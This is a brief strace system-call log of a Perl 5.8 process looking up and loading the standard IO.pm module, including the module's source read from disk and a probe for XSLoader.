10034 07:31:01.226970 stat64("/usr/local/share/perl/5.8.8/IO.pmc", 0xbf8a5dfc) = -1 ENOENT (No such file or directory)

10034 07:31:01.226982 stat64("/usr/local/share/perl/5.8.8/IO.pm", 0xbf8a5d0c) = -1 ENOENT (No such file or directory)

10034 07:31:01.226996 stat64("/usr/lib/perl5/IO.pmc", 0xbf8a5dfc) = -1 ENOENT (No such file or directory)

10034 07:31:01.227008 stat64("/usr/lib/perl5/IO.pm", 0xbf8a5d0c) = -1 ENOENT (No such file or directory)

10034 07:31:01.227021 stat64("/usr/share/perl5/IO.pmc", 0xbf8a5dfc) = -1 ENOENT (No such file or directory)

10034 07:31:01.227033 stat64("/usr/share/perl5/IO.pm", 0xbf8a5d0c) = -1 ENOENT (No such file or directory)

10034 07:31:01.227045 stat64("/usr/lib/perl/5.8/IO.pmc", 0xbf8a5dfc) = -1 ENOENT (No such file or directory)

10034 07:31:01.227058 stat64("/usr/lib/perl/5.8/IO.pm", {st_mode=S_IFREG|0644, st_size=413, ...}) = 0

10034 07:31:01.227079 open("/usr/lib/perl/5.8/IO.pm", O_RDONLY|O_LARGEFILE) = 6

10034 07:31:01.227093 ioctl(6, SNDCTL_TMR_TIMEBASE or TCGETS, 0xbf8a5b18) = -1 ENOTTY (Inappropriate ioctl for device)

10034 07:31:01.227104 _llseek(6, 0, [0], SEEK_CUR) = 0

10034 07:31:01.227127 read(6, "#\n\npackage IO;\n\nuse XSLoader ();\nuse Carp;\nuse strict;\nuse warnings;\n\nour $VERSION = \"1.22\";\nXSLoader::load \'IO\', $VERSION;\n\nsub import {\n    shift;\n\n    warnings::warnif(\'deprecated\', qq{Parameterless \"use IO\" deprecated})\n        if @_ == 0 ;\n    \n    my @l = @_ ? @_ : qw(Handle Seekable File Pipe Socket Dir);\n\n    eval join(\"\", map { \"require IO::\" . (/(\\w+)/)[0] . \";\\n\" } @l)\n\tor croak $@;\n}\n\n1;\n\n__END__\n\n", 4096) = 413

10034 07:31:01.227183 stat64("/etc/perl/XSLoader.pmc", 0xbf8a594c) = -1 ENOENT (No such file or directory)

10034 07:31:01.227210 stat64("/etc/perl/XSLoader.pm", 0xbf8a585c) = -1 ENOENT (No such file or directory)

